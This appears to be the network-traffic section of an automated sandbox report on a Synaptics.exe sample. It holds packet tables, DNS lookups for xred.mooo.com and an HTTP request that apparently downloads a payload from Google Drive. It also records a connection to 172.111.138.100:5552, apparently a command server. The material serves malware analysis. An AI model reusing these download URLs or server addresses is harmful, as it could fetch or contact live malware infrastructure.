                                                                                                                                      Dec 30, 2024 11:23:38.554708958 CET44350004142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:38.554759979 CET50004443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:38.668538094 CET44350005142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:38.669842958 CET50005443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:38.814877033 CET50002443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:38.814918995 CET44350002142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:38.815264940 CET44350002142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:38.815327883 CET50002443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:38.816066027 CET50002443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:38.820152044 CET50003443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:38.820180893 CET44350003142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:38.831357956 CET50003443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:38.831371069 CET44350003142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:38.863343000 CET44350002142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:38.934405088 CET50004443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:38.934433937 CET44350004142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:38.934745073 CET44350004142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:38.935374022 CET50004443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:38.937386990 CET50004443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:38.970897913 CET50005443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:38.970927954 CET44350005142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:38.971173048 CET50005443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:38.971178055 CET44350005142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:38.979331017 CET44350004142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:39.101516008 CET44350002142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:39.101577044 CET50002443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:39.101586103 CET44350002142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:39.101620913 CET50002443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:39.102123022 CET44350002142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:39.102161884 CET44350002142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:39.102190018 CET50002443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:39.102210045 CET50002443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:39.104248047 CET50002443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:39.104257107 CET44350002142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:39.104942083 CET50012443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:39.104973078 CET44350012142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:39.105062008 CET50012443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:39.107780933 CET50012443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:39.107795000 CET44350012142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:39.163346052 CET44350003142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:39.163393974 CET44350003142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:39.163419962 CET50003443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:39.163487911 CET44350003142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:39.163528919 CET50003443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:39.163558006 CET50003443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:39.163630009 CET44350003142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:39.163665056 CET44350003142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:39.163712978 CET50003443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:39.164756060 CET50003443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:39.164767027 CET44350003142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:39.165776014 CET50018443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:39.165806055 CET44350018142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:39.165862083 CET50018443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:39.166114092 CET50018443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:39.166126013 CET44350018142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:39.224570990 CET44350004142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:39.224639893 CET50004443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:39.224664927 CET44350004142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:39.224704981 CET50004443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:39.225105047 CET44350004142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:39.225145102 CET44350004142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:39.225188971 CET50004443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:39.227365971 CET50004443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:39.227376938 CET44350004142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:39.227865934 CET50019443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:39.227900028 CET44350019142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:39.227993011 CET50019443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:39.228836060 CET50019443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:39.228851080 CET44350019142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:39.302412033 CET44350005142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:39.302468061 CET44350005142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:39.302515030 CET50005443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:39.302552938 CET44350005142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:39.302568913 CET50005443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:39.302607059 CET44350005142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:39.302695036 CET50005443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:39.302732944 CET50005443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:39.303533077 CET50005443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:39.303548098 CET44350005142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:39.304141045 CET50020443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:39.304172039 CET44350020142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:39.304251909 CET50020443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:39.304459095 CET50020443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:39.304474115 CET44350020142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:39.716481924 CET44350012142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:39.716540098 CET50012443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:39.717063904 CET50012443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:39.717073917 CET44350012142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:39.717302084 CET50012443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:39.717307091 CET44350012142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:39.764884949 CET44350018142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:39.764950037 CET50018443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:39.775687933 CET50018443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:39.775708914 CET44350018142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:39.777565002 CET50018443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:39.777570963 CET44350018142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:39.847687960 CET44350019142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:39.847767115 CET50019443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:39.850990057 CET50019443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:39.850996971 CET44350019142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:39.851211071 CET50019443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:39.851217031 CET44350019142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:39.923648119 CET44350020142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:39.923712015 CET50020443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:39.925446033 CET50020443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:39.925452948 CET44350020142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:39.926023006 CET50020443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:39.926028013 CET44350020142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:40.091454029 CET44350012142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:40.091512918 CET50012443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:42.608763933 CET50046443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:42.608763933 CET50046443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:42.608791113 CET44350046142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:42.609790087 CET50046443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:42.609805107 CET44350046142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:42.615323067 CET44350045142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:42.647320032 CET44350047142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:42.944493055 CET44350045142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:42.945378065 CET50045443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:42.945400953 CET44350045142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:42.945597887 CET50045443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:42.945873022 CET50045443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:42.945904016 CET44350045142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:42.946036100 CET44350045142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:42.946120024 CET50045443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:42.946218967 CET50045443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:42.946506977 CET50059443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:42.946541071 CET44350059142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:42.946877956 CET50059443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:42.947825909 CET50059443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:42.947840929 CET44350059142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:42.975874901 CET44350047142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:42.975944996 CET44350047142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:42.975981951 CET50047443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:42.976006031 CET50047443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:42.977952957 CET50047443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:42.977967024 CET44350047142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:42.977991104 CET50060443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:42.978027105 CET44350060142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:42.979480028 CET50060443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:42.979480028 CET50060443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:42.979512930 CET44350060142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:43.061994076 CET44350044142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:43.062052965 CET44350044142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:43.062082052 CET50044443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:43.062099934 CET44350044142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:43.062163115 CET44350044142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:43.062189102 CET50044443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:43.062345028 CET50044443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:43.062851906 CET50044443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:43.062865019 CET44350044142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:43.063616991 CET50061443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:43.063637018 CET44350061142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:43.065207958 CET50061443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:43.065385103 CET50061443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:43.065402985 CET44350061142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:43.069130898 CET44350046142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:43.069171906 CET44350046142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:43.069199085 CET50046443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:43.069209099 CET44350046142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:43.069375038 CET44350046142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:43.069426060 CET50046443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:43.069586992 CET50046443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:43.069778919 CET50046443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:43.069782972 CET44350046142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:43.070142031 CET50062443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:43.070199966 CET44350062142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:43.070455074 CET50062443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:43.070455074 CET50062443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:43.070497036 CET44350062142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:43.566720963 CET44350059142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:43.567666054 CET50059443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:43.583378077 CET44350060142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:43.583659887 CET50060443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:43.664397955 CET44350061142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:43.667675018 CET50061443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:43.673207998 CET44350062142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:43.674523115 CET50062443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:43.731812954 CET50059443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:43.731831074 CET44350059142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:43.732007027 CET50059443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:43.732011080 CET44350059142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:43.732913971 CET50060443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:43.732927084 CET44350060142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:43.733145952 CET50060443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:43.733151913 CET44350060142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:43.797297001 CET50061443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:43.797321081 CET44350061142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:43.797483921 CET50061443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:43.797491074 CET44350061142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:43.847984076 CET50062443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:43.848000050 CET44350062142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:43.848150015 CET50062443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:43.848156929 CET44350062142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:44.013819933 CET44350059142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:44.014674902 CET44350059142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:44.014766932 CET50059443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:44.020839930 CET44350060142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:44.020898104 CET50060443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:44.020921946 CET44350060142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:44.021022081 CET50060443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:44.021630049 CET44350060142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:44.021682978 CET44350060142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:44.021737099 CET50060443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:44.066180944 CET50059443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:44.066205025 CET44350059142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:44.067135096 CET50066443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:44.067161083 CET44350066142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:44.067218065 CET50066443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:44.069842100 CET50060443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:44.069860935 CET44350060142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:44.073786974 CET50067443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:44.073829889 CET44350067142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:44.073915005 CET50067443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:44.077474117 CET50067443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:44.077487946 CET44350067142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:44.089673042 CET50066443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:44.089685917 CET44350066142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:44.124528885 CET44350061142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:44.124586105 CET44350061142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:44.124610901 CET50061443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:44.124628067 CET44350061142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:44.124649048 CET50061443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:44.124675989 CET50061443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:44.124681950 CET44350061142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:44.124703884 CET44350061142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:44.124723911 CET50061443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:44.124742031 CET50061443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:44.126465082 CET50061443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:44.126477003 CET44350061142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:44.127346039 CET50072443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:44.127377033 CET44350072142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:44.127441883 CET50072443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:44.127621889 CET50072443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:44.127631903 CET44350072142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:44.275629997 CET44350062142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:44.275685072 CET44350062142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:44.275751114 CET50062443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:44.275801897 CET44350062142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:44.275861025 CET44350062142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:44.275907040 CET50062443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:44.673022985 CET500755552192.168.2.5172.111.138.100
                                                                                                                                      Dec 30, 2024 11:23:44.676711082 CET44350067142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:44.676779985 CET50067443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:44.677866936 CET555250075172.111.138.100192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:44.677953005 CET500755552192.168.2.5172.111.138.100
                                                                                                                                      Dec 30, 2024 11:23:44.678862095 CET500755552192.168.2.5172.111.138.100
                                                                                                                                      Dec 30, 2024 11:23:44.683661938 CET555250075172.111.138.100192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 30, 2024 11:23:04.712969065 CET | 192.168.2.5 | 1.1.1.1 | 0x36b9 | Standard query (0) | docs.google.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:23:05.177963972 CET | 192.168.2.5 | 1.1.1.1 | 0xa969 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:23:05.196407080 CET | 192.168.2.5 | 1.1.1.1 | 0xfae2 | Standard query (0) | freedns.afraid.org | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:23:05.808444023 CET | 192.168.2.5 | 1.1.1.1 | 0x81f | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:23:11.472098112 CET | 192.168.2.5 | 1.1.1.1 | 0x67f8 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:23:18.287687063 CET | 192.168.2.5 | 1.1.1.1 | 0x48df | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:23:25.188884974 CET | 192.168.2.5 | 1.1.1.1 | 0x5c84 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:23:32.047303915 CET | 192.168.2.5 | 1.1.1.1 | 0xd11 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:23:36.886969090 CET | 192.168.2.5 | 1.1.1.1 | 0x511a | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:23:42.563348055 CET | 192.168.2.5 | 1.1.1.1 | 0x9848 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 30, 2024 11:23:04.722398043 CET | 1.1.1.1 | 192.168.2.5 | 0x36b9 | No error (0) | docs.google.com |  | 142.250.186.110 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:23:05.185205936 CET | 1.1.1.1 | 192.168.2.5 | 0xa969 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:23:05.204065084 CET | 1.1.1.1 | 192.168.2.5 | 0xfae2 | No error (0) | freedns.afraid.org |  | 69.42.215.252 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:23:05.816103935 CET | 1.1.1.1 | 192.168.2.5 | 0x81f | No error (0) | drive.usercontent.google.com |  | 142.250.186.33 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:23:11.479224920 CET | 1.1.1.1 | 192.168.2.5 | 0x67f8 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:23:18.295396090 CET | 1.1.1.1 | 192.168.2.5 | 0x48df | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:23:25.196072102 CET | 1.1.1.1 | 192.168.2.5 | 0x5c84 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:23:32.146699905 CET | 1.1.1.1 | 192.168.2.5 | 0xd11 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:23:36.894064903 CET | 1.1.1.1 | 192.168.2.5 | 0x511a | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:23:42.570154905 CET | 1.1.1.1 | 192.168.2.5 | 0x9848 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
                                                                                                                                      • docs.google.com
                                                                                                                                      • drive.usercontent.google.com
                                                                                                                                      • freedns.afraid.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49712 | 69.42.215.252 | 80 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
Dec 30, 2024 11:23:05.213248014 CET | 154 | OUT | GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
                                                                                                                                      User-Agent: MyApp
                                                                                                                                      Host: freedns.afraid.org
                                                                                                                                      Cache-Control: no-cache
Dec 30, 2024 11:23:05.800957918 CET | 243 | IN | HTTP/1.1 200 OK
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:05 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      X-Cache: MISS
                                                                                                                                      Data Raw: 31 66 0d 0a 45 52 52 4f 52 3a 20 43 6f 75 6c 64 20 6e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 2e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 1fERROR: Could not authenticate.0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49709 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:05 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
2024-12-30 10:23:05 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
